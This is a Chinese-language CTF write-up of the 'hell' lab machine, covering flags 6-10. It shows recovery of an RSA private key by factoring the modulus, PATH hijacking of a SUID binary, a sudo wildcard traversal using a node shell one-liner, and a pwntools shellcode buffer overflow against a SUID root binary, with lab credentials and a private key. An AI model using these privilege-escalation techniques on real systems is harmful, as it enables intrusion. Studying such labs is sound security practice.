█▀▄ █▄█ █▄█  █  ▄ ▄ ▄   █▀█ █▄█ █▀█ █ █ ▀█

Flag 6: HELL{7H3_5QL1_15_7H3_K3Y}

root@748760521d12:~# cat message.txt

From: [email protected]

Hi, I have left ssh credentials in the .enc file, remember to decrypt it with your private rsa key :)
嗨，我已将 ssh 凭据留在 .enc 文件中，请记得使用您的私人 RSA 密钥解密它 :)

利用scp传到本地

root@748760521d12:~/creds# cp * /tmp/
---------------------------------------------------
❯ scp [email protected]:/tmp/creds.enc .
[email protected]'s password:
creds.enc                                100%  129    22.2KB/s   00:00
❯ scp [email protected]:/tmp/public.crt .
[email protected]'s password:
public.crt                               100%  451   177.3KB/s   00:00

RSA解密

如果需要解密enc文件的话，需要私钥文件，文件夹中只存在public.crt公钥文件且密钥内容比较小

那么如何得到私钥文件，接下去就是关于RSA加密的原理了

一文详解 RSA 非对称加密算法 - bjxiaxueliang - 博客园

尝试去构造一个新的私钥文件

先利用公钥提取其中的n(RSA模数)和e(公钥指数)

#!/usr/bin/env python3
from Crypto.PublicKey import RSA
 
with open("public.crt", "r") as f:
    key = RSA.import_key(f.read())
    e = key.e
    n = key.n
print("[+]e==>{}\n[+]n==>{}".format(e,n))

运行一下

1
2
3

❯ python3 exp.py
[+]e==>115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139
[+]n==>279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517

利用在线网站factordb.com

将n(RSA模数)进行因式分解，得到两个素数p q

p=138332730979330219856304683346871871770016076664792385217756486565264414883613702355484155067169073708131875489151186473
19766004327241150104265530014047083
q=201965962654304519806134133066947216662284527878164688789843567876520994722309341291582467112996951355410672076462819016
20878148034692171475252446937792199

其中的m为n-(p+q-1)

通过模逆元计算得到d

利用python生成RSA私钥文件

#!/usr/bin/python3
from Crypto.PublicKey import RSA
 
n=279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517
e=115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139
p=13833273097933021985630468334687187177001607666479238521775648656526441488361370235548415506716907370813187548915118647319766004327241150104265530014047083
q=20196596265430451980613413306694721666228452787816468878984356787652099472230934129158246711299695135541067207646281901620878148034692171475252446937792199
 
m=n-(p+q-1)
 
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)
 
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise
    else:
        return x % m
 
d = modinv(e, m)
 
key = RSA.construct((n, e, d, p, q))
print(key.exportKey().decode())

执行一下

❯ python3 exp.py|tee rsa
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAKBgQGN24SSfsyl/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd
gY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf
ytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk
zWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc
EZHPnIba0wZ/8+cgzNxpNmtkG/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW
i2CItuiV3AUIjKXT/TjdqXcW/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz
d6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B
A5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC
h6yTdJ5rMTFv3a7/hGGcpCucYiadTIxfIR0R1ey8/Oqe4HgwWz9YKZ1re02bL9fn
cIKouKi+xwIgSJiewFB8qwlK2nqa7tazd6DQtCKbEwXMl4BUeiJVRkcCIEiYnsBQ
fKsJStp6mu7Ws3eg0LQimxMFzJeAVHoiVUZHAkA3pS0IKm+cCT6r0fObMnPKoxur
bzwDyPPczkvzOAyTGsGUfeHhseLHZKVAvqzLbrEdTFo906cZWpLJAIEt8SD9
-----END RSA PRIVATE KEY-----

尝试利用私钥文件解密enc文件

得到新的用户凭证pascual:vulnwhatsapp123!

Root提权

利用ssh连接一下

发现flag7并且存在history文件，得知用户曾进行过操作查看邮件

❯ ssh pascual@$ip
The authenticity of host '192.168.60.136 (192.168.60.136)' can't be established.
ED25519 key fingerprint is SHA256:aUSoZyYPezlPKdiG/TOw1clwpRm5PrR4RkQxZSy7JnE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.136' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-60-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

You have new mail.
Last login: Thu Feb 16 07:33:38 2023 from 192.168.193.129
pascual@hell:~$ cat flag.txt

█▀█ ▄▀█ █▀ █▀▀ █ █ ▄▀█ █   █▀█ █▀█ █▀█ █
█▀▀ █▀█ ▄█ █▄▄ █▄█ █▀█ █▄▄ █▀▄ █▄█ █▀▀ █

Flag 7: HELL{R54C7F7001_OR_M4NU41?}

pascual@hell:~$ cat .bash_history
………………省略………………
cat /var/mail/pascual
………………………………
exit
pascual@hell:~$ cat /var/mail/pascual

From: [email protected]

I have created a reports binary in /opt/reports/reports with which you can read the reports by passing an identifier as an argument to it
我已经在/opt/reports/reports创建了一个报告二进制文件，您可以通过将标识符作为参数传递给它来阅读报告。

发现在/opt下存在用户eddie的带有suid权限的文件

利用strings分析程序

pascual@hell:/opt/reports$ ls -la
total 24
drwx------ 2 pascual pascual  4096 Feb 16  2023 .
drwxr-xr-x 5 root    root     4096 Feb 16  2023 ..
-rwsr-xr-x 1 eddie   eddie   16208 Feb 16  2023 reports
pascual@hell:/opt/reports$ strings reports
/lib64/ld-linux-x86-64.so.2
__cxa_finalize
setreuid
__libc_start_main
system
strlen
sprintf
putchar
__stack_chk_fail
libc.so.6
GLIBC_2.4
GLIBC_2.34
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
        v%H
[0;37m[
[0;31m-
[0;37m] Usage: %s <id for report>
[0;37m[
[0;31m-
[0;37m] The input must be an identifier digit
cat /home/eddie/report/%s
:*3$"
GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
ph.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
putchar@GLIBC_2.2.5
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
strlen@GLIBC_2.2.5
__stack_chk_fail@GLIBC_2.4
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
setreuid@GLIBC_2.2.5
__bss_start
main
sprintf@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

PATH路径劫持

主要功能就是读取/home/eddie/report/下面的文件内容

不过只能输入数字，猜测可以进行目录穿越，然而并不行

pascual@hell:/opt/reports$ ./reports 1
Vulnerability: A Local File Inclusion has been detected in one of our web servers.
已检测到一个本地文件包含漏洞在我们的一个web服务器中。

pascual@hell:/opt/reports$ ./reports 2
Vulnerability: SQL Injection has been detected in one of our servers.
漏洞：我们的一个服务器检测到SQL注入。

pascual@hell:/opt/reports$ ./reports 3
Attention: Please fix this as soon as possible.
请尽快修复。

不过你可以发现他调用的cat并不是绝对路径，因此可以利用路径劫持

拿到eddie用户并且存在flag8

pascual@hell:/tmp$ echo 'bash'>cat
pascual@hell:/tmp$ chmod +x cat
pascual@hell:/tmp$ export PATH=.:$PATH
pascual@hell:/tmp$ /opt/reports/reports 1

eddie@hell:~$ cd /home/eddie/
eddie@hell:/home/eddie$ ls
flag.txt  report
eddie@hell:/home/eddie$ /bin/cat flag.txt

█▀▀ █▀▄ █▀▄ █ █▀▀ █▀▄ █▀█ ▀█▀ ▄▀█
██▄ █▄▀ █▄▀ █ ██▄ █▄▀ █▄█  █  █▀█

Flag 8: HELL{R3L4T1V3_R0U735_4R3_FUN!}

尝试搜索一下属于用户eddie的所有文件

eddie@hell:/home/eddie$ find / -user eddie 2>/dev/null |grep -Pv 'sys|proc'
/home/eddie
/home/eddie/flag.txt
/home/eddie/.ssh
/home/eddie/.cache
/home/eddie/.cache/motd.legal-displayed
/home/eddie/.local
/home/eddie/.local/share
/home/eddie/.local/share/nano
/home/eddie/.profile
/home/eddie/.bashrc
/home/eddie/.bash_logout
/home/eddie/report
/home/eddie/report/1
/home/eddie/report/2
/home/eddie/report/3
/var/mail/eddie
eddie@hell:/home/eddie$ /bin/cat /var/mail/eddie

From: [email protected]

Hi eddie, can you see my hacked facebook account, I leave you the last password I remember: MySuperSecurePassword123!
嗨埃迪，你能看到我的被黑的Facebook账户吗？我留给你我记得的最后一个密码：MySuperSecurePassword123!

通配符路径穿越

猜测作者又进行了密码复用，尝试登录一下发信人ghost

eddie@hell:/home/eddie$ su ghost
Password:
ghost@hell:/home/eddie$ cd ~
ghost@hell:~$ ls
flag.txt  message.txt
ghost@hell:~$ cat flag.txt

█▀█ █▄▄ █▀▀ ▀▄▀ █▀▀ █ █ █▀█ █▀ ▀█▀
█▄█ █▄█ █▀  █ █ █▄█ █▀█ █▄█ ▄█  █

Flag 9: HELL{B14CKH47_H4CK3R_F4C3B00K_WTF?}

ghost@hell:~$ cat message.txt

From: [email protected]

Hi ghost, just a heads up I created a script in node.js that converts text to hexadecimal, I'll leave it at my home directory for you to try, it's called hex.js :)
嗨鬼，提醒一下我创建了一个在node.js中将文本转换为十六进制的脚本，我会把它放在我的主目录里让你试试，名字叫做hex.js :)

用户ghost拥有sudo权限可以执行node

ghost@hell:~$ sudo -l
[sudo] password for ghost:
Matching Defaults entries for ghost on hell:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User ghost may run the following commands on hell:
    (gato) /usr/bin/node /home/gato/*

不过后面用了通配符*所以可以进行目录穿越

尝试提权一下

在此之前需要gato能够读取到用户ghost的文件

ghost@hell:~$ chmod 777 /homeghost/
ghost@hell:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' > a.js
ghost@hell:~$ chmod +x a.js
ghost@hell:~$ sudo -u gato /usr/bin/node /home/gato/../ghost/a.js
$ bash
gato@hell:~$ cat flag.txt

█▀▀ ▄▀█ ▀█▀ █▀█ █▀▀ ▄▀█ █▀▄▀█ █▀▀ █▀█ ▄█ ▄█ █▀ █▀
█▄█ █▀█  █  █▄█ █▄█ █▀█ █ ▀ █ ██▄ █▀▄  █  █ ▄█ ▄█

Flag 10: HELL{7H3_5UD03R5_15_N07_4_60D_1D34}

Stack Overflow 栈溢出

再次信息收集

发现/opt/projects/strlen拥有suid权限

gato@hell:~$ find / -perm -u=s -type f 2>/dev/null
/opt/projects/strlen
/usr/bin/fusermount3
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/gpasswd
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
gato@hell:/opt$ cd projects/
gato@hell:/opt/projects$ ls -al
total 24
drwx------ 2 gato gato  4096 Feb 16  2023 .
drwxr-xr-x 5 root root  4096 Feb 16  2023 ..
-rwsr-xr-x 1 root root 13064 Feb 15  2023 strlen
gato@hell:/opt/projects$ strings strlen
/lib64/ld-linux-x86-64.so.2
Q9Ho
__libc_start_main
strcpy
puts
strlen
setuid
printf
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
__gmon_start__
PTE1
H=X4@
[0;37m[
[0;31m-
[0;37m] Usage: %s <string>
[0;37m[
[0;34m*
[0;37m] String: %s
[0;37m[
[0;32m+
[0;37m] Length: %lu
:*3$"
GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0
crt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
strlen.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
strcpy@GLIBC_2.2.5
puts@GLIBC_2.2.5
_edata
_fini
strlen@GLIBC_2.2.5
printf@GLIBC_2.2.5
overflow
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
_dl_relocate_static_pie
__bss_start
main
__TMC_END__
setuid@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment

不过我发现当你输入超过256个字符后会出现Segmentation fault (core dumped)

存在栈溢出漏洞

策略一

ROP链为**padding + shellcode + rip**

首先利用pwndbg查看偏移量

得到偏移为264

❯ gdb -q strlen
pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from strlen...
(No debugging symbols found in strlen)
------- tip of the day (disable with set show-tips off) -------
Use the spray command to spray memory with cyclic pattern or specified value
pwndbg> cyclic 300
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
pwndbg> r aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
Starting program: /home/Pepster/hmv/strlen aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

█▀ ▀█▀ █▀█ █   █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa

[+] Length: 300


Program received signal SIGSEGV, Segmentation fault.
0x0000000000401297 in overflow ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────
 RAX  0x7fffffffdbf0 ◂— 0x6161616161616161 ('aaaaaaaa')
 RBX  0x7fffffffde28 —▸ 0x7fffffffe134 ◂— '/home/Pepster/hmv/strlen'
 RCX  0
 RDX  0x19
 RDI  0x7fffffffdca2 ◂— 'aaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
 RSI  0x7fffffffe1ff ◂— 'aaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
 R8   0x75
 R9   0xfffffffd
 R10  3
 R11  0x7ffff7f18990 (__strcpy_avx2) ◂— vpxor xmm7, xmm7, xmm7
 R12  0
 R13  0x7fffffffde40 —▸ 0x7fffffffe27a ◂— 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus'
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 R15  0x403220 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401180 (__do_global_dtors_aux) ◂— endbr64
 RBP  0x6261616161616168 ('haaaaaab')
 RSP  0x7fffffffdcf8 ◂— 'iaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
 RIP  0x401297 (overflow+117) ◂— ret
─────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────
 ► 0x401297 <overflow+117>    ret                                <0x6261616161616169>
    ↓



──────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdcf8 ◂— 'iaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa'
01:0008│     0x7fffffffdd00 ◂— 'jaaaaaabkaaaaaablaaaaaabmaaa'
02:0010│     0x7fffffffdd08 ◂— 'kaaaaaablaaaaaabmaaa'
03:0018│     0x7fffffffdd10 ◂— 'laaaaaabmaaa'
04:0020│     0x7fffffffdd18 ◂— 0x7f006161616d /* 'maaa' */
05:0028│     0x7fffffffdd20 —▸ 0x7fffffffde10 —▸ 0x7fffffffde18 ◂— 0x38 /* '8' */
06:0030│     0x7fffffffdd28 —▸ 0x4011b6 (main) ◂— endbr64
07:0038│     0x7fffffffdd30 ◂— 0x200400040 /* '@' */
────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────
 ► 0         0x401297 overflow+117
   1 0x6261616161616169 None
   2 0x626161616161616a None
   3 0x626161616161616b None
   4 0x626161616161616c None
   5   0x7f006161616d None
   6   0x7fffffffde10 None
   7         0x4011b6 main
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264
pwndbg>

为了增加容错性将padding设为\x90(nop)

尝试寻找包含NOPS的rip地址，让 RIP 指向padding包含 NOP Sled（\x90 滑板）的栈区域

由于padding后面紧跟的就是shellcode

所以RIP（返回地址）的作用是跳转到shellcode

NOP 雪橇的意义：容错性

NOP（\x90）的作用：NOP 是空操作指令，CPU 会直接跳过它执行下一条指令。

NOP 雪橇的布局：在 Shellcode 前填充大量 NOP 指令，形成一个“滑行区”。

为何需要滑行区

：

无需精确命中地址：只要 RIP 指向 NOP 雪橇中的任意位置，CPU 会一路执行 NOP 指令，直到滑入 Shellcode。

对抗地址随机性：在 ASLR 关闭的测试环境中，栈地址可能因调试环境或输入差异轻微偏移，NOP 雪橇可提高利用成功率。

脚本如下

from pwn import *
import sys

context(arch='amd64', os='linux', log_level='info')

# 1. 生成 Shellcode
shellcode = asm(shellcraft.sh())

# 2. 计算 Padding 长度
offset = 264
nop_padding = b'\x90' * (offset - len(shellcode))

# 3. 获取 Shellcode 地址（需动态泄漏或已知固定地址）
rip = b"B" * 6 #添加6个B调试

# 4. 构造 Payload
payload = flat(
    nop_padding,
    shellcode,
    rip                # 覆盖 rip 为 shellcode 地址
)

# 发送 Payload
#io = process(["/opt/projects/strlen", payload])
#io.interactive()
# 输出到标准输出（二进制模式）
sys.stdout.buffer.write(payload)

再次运行gdb，可以看到崩溃后正好就是0x424242424242字符串B，说明成功覆盖了 RIP

gato@hell:/tmp$ gdb -q /opt/projects/strlen
Reading symbols from /opt/projects/strlen...
(No debugging symbols found in /opt/projects/strlen)
gdb-peda$ run $(python3 a.py)
Starting program: /opt/projects/strlen $(python3 a.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

█▀ ▀█▀ █▀█ █   █▀▀ █▄ █
▄█  █  █▀▄ █▄▄ ██▄ █ ▀█

[*] String: jhH/bin///sPHhri4$1V^HVH1j;XBBBBBB

[+] Length: 270


Program received signal SIGSEGV, Segmentation fault.
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe2b0 --> 0x9090909090909090
RBX: 0x0
RCX: 0x7fffffffe850 --> 0x3d4c4c4548530042 ('B')
RDX: 0x7fffffffe3bd --> 0xffffffe4e8000042
RSI: 0xd ('\r')
RDI: 0x7fffffffe2b0 --> 0x9090909090909090
RBP: 0x50f583b6ad231e6
RSP: 0x7fffffffe3c0 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x0
R9 : 0x9090909090909090
R10: 0x7ffff7d96db8 --> 0xf001a00004252
R11: 0x7ffff7f16010 (<__strcpy_ssse3>:  endbr64)
R12: 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
R13: 0x4011b6 (<main>:  endbr64)
R14: 0x403220 --> 0x401180 (<__do_global_dtors_aux>:    endbr64)
R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
0008| 0x7fffffffe3c8 --> 0x200000000
0016| 0x7fffffffe3d0 --> 0x2
0024| 0x7fffffffe3d8 --> 0x7ffff7db5d90 (<__libc_start_call_main+128>:  mov    edi,eax)
0032| 0x7fffffffe3e0 --> 0x0
0040| 0x7fffffffe3e8 --> 0x4011b6 (<main>:      endbr64)
0048| 0x7fffffffe3f0 --> 0x200000000
0056| 0x7fffffffe3f8 --> 0x7fffffffe4e8 --> 0x7fffffffe72e ("/opt/projects/strlen")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
gdb-peda$ x/250wx $rsp
0x7fffffffe3c0: 0xffffe4e8      0x00007fff      0x00000000      0x00000002
0x7fffffffe3d0: 0x00000002      0x00000000      0xf7db5d90      0x00007fff
0x7fffffffe3e0: 0x00000000      0x00000000      0x004011b6      0x00000000
0x7fffffffe3f0: 0x00000000      0x00000002      0xffffe4e8      0x00007fff
0x7fffffffe400: 0x00000000      0x00000000      0xe632ff11      0x04fb881e
0x7fffffffe410: 0xffffe4e8      0x00007fff      0x004011b6      0x00000000
0x7fffffffe420: 0x00403220      0x00000000      0xf7ffd040      0x00007fff
0x7fffffffe430: 0x21f6ff11      0xfb0477e1      0x5cbeff11      0xfb0467a8
0x7fffffffe440: 0x00000000      0x00007fff      0x00000000      0x00000000
0x7fffffffe450: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe460: 0x00000000      0x00000000      0x613f5100      0xc700095f
0x7fffffffe470: 0x00000000      0x00000000      0xf7db5e40      0x00007fff
0x7fffffffe480: 0xffffe500      0x00007fff      0x00403220      0x00000000
0x7fffffffe490: 0xf7ffe2e0      0x00007fff      0x00000000      0x00000000
0x7fffffffe4a0: 0x00000000      0x00000000      0x004010d0      0x00000000
0x7fffffffe4b0: 0xffffe4e0      0x00007fff      0x00000000      0x00000000
0x7fffffffe4c0: 0x00000000      0x00000000      0x004010f5      0x00000000
0x7fffffffe4d0: 0xffffe4d8      0x00007fff      0x0000001c      0x00000000
0x7fffffffe4e0: 0x00000002      0x00000000      0xffffe72e      0x00007fff
0x7fffffffe4f0: 0xffffe743      0x00007fff      0x00000000      0x00000000
0x7fffffffe500: 0xffffe852      0x00007fff      0xffffe862      0x00007fff
0x7fffffffe510: 0xffffe870      0x00007fff      0xffffe8a4      0x00007fff
0x7fffffffe520: 0xffffe8b4      0x00007fff      0xffffe8bd      0x00007fff
0x7fffffffe530: 0xffffe8ca      0x00007fff      0xffffe8d9      0x00007fff
0x7fffffffe540: 0xffffe8e2      0x00007fff      0xffffe8f2      0x00007fff
0x7fffffffe550: 0xffffe8ff      0x00007fff      0xffffeeee      0x00007fff
0x7fffffffe560: 0xffffeef9      0x00007fff      0xffffef1b      0x00007fff
0x7fffffffe570: 0xffffef30      0x00007fff      0xffffef50      0x00007fff
0x7fffffffe580: 0xffffef5a      0x00007fff      0xffffef62      0x00007fff
0x7fffffffe590: 0xffffefae      0x00007fff      0xffffefbc      0x00007fff
0x7fffffffe5a0: 0xffffefd0      0x00007fff      0x00000000      0x00000000
0x7fffffffe5b0: 0x00000021      0x00000000      0xf7fc1000      0x00007fff
0x7fffffffe5c0: 0x00000033      0x00000000      0x000005a0      0x00000000
0x7fffffffe5d0: 0x00000010      0x00000000      0x178bfbff      0x00000000
0x7fffffffe5e0: 0x00000006      0x00000000      0x00001000      0x00000000
0x7fffffffe5f0: 0x00000011      0x00000000      0x00000064      0x00000000
0x7fffffffe600: 0x00000003      0x00000000      0x00400040      0x00000000
0x7fffffffe610: 0x00000004      0x00000000      0x00000038      0x00000000
0x7fffffffe620: 0x00000005      0x00000000      0x0000000c      0x00000000
0x7fffffffe630: 0x00000007      0x00000000      0xf7fc3000      0x00007fff
0x7fffffffe640: 0x00000008      0x00000000      0x00000000      0x00000000
0x7fffffffe650: 0x00000009      0x00000000      0x004010d0      0x00000000
0x7fffffffe660: 0x0000000b      0x00000000      0x000003e8      0x00000000
0x7fffffffe670: 0x0000000c      0x00000000      0x000003e8      0x00000000
0x7fffffffe680: 0x0000000d      0x00000000      0x000003e8      0x00000000
0x7fffffffe690: 0x0000000e      0x00000000      0x000003e8      0x00000000
0x7fffffffe6a0: 0x00000017      0x00000000      0x00000001      0x00000000
0x7fffffffe6b0: 0x00000019      0x00000000      0xffffe709      0x00007fff
0x7fffffffe6c0: 0x0000001a      0x00000000      0x00000002      0x00000000
0x7fffffffe6d0: 0x0000001f      0x00000000      0xffffefe3      0x00007fff
0x7fffffffe6e0: 0x0000000f      0x00000000      0xffffe719      0x00007fff
0x7fffffffe6f0: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe700: 0x00000000      0x00000000      0x3f51ec00      0x00095f61
0x7fffffffe710: 0x0f731bc7      0x88827dc4      0x3638787f      0x0034365f
0x7fffffffe720: 0x00000000      0x00000000      0x00000000      0x6f2f0000
0x7fffffffe730: 0x702f7470      0x656a6f72      0x2f737463      0x6c727473
0x7fffffffe740: 0x90006e65      0x90909090      0x90909090      0x90909090
0x7fffffffe750: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe760: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe770: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe780: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe790: 0x90909090      0x90909090      0x90909090      0x90909090
